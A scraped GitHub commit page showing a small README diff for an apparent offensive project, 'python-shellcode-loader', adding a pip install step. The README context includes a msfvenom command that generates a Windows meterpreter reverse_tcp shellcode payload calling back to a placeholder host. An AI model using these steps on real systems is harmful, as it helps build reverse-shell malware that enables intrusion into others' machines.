We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent bd136cf commit 51c7b49Copy full SHA for 51c7b49
README.md
@@ -7,6 +7,7 @@
7
## 获取项目
8
git clone https://github.com/HZzz2/python-shellcode-loader.git <br />cd python-shellcode-loader
9
<a name="CuRMC"></a>
10
+pip install -r .\requirements.txt
11
## 生成shellcode
12
#生成shellcode<br />`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999 -f raw > rev.raw`
13
<a name="rNUTI"></a>
0 commit comments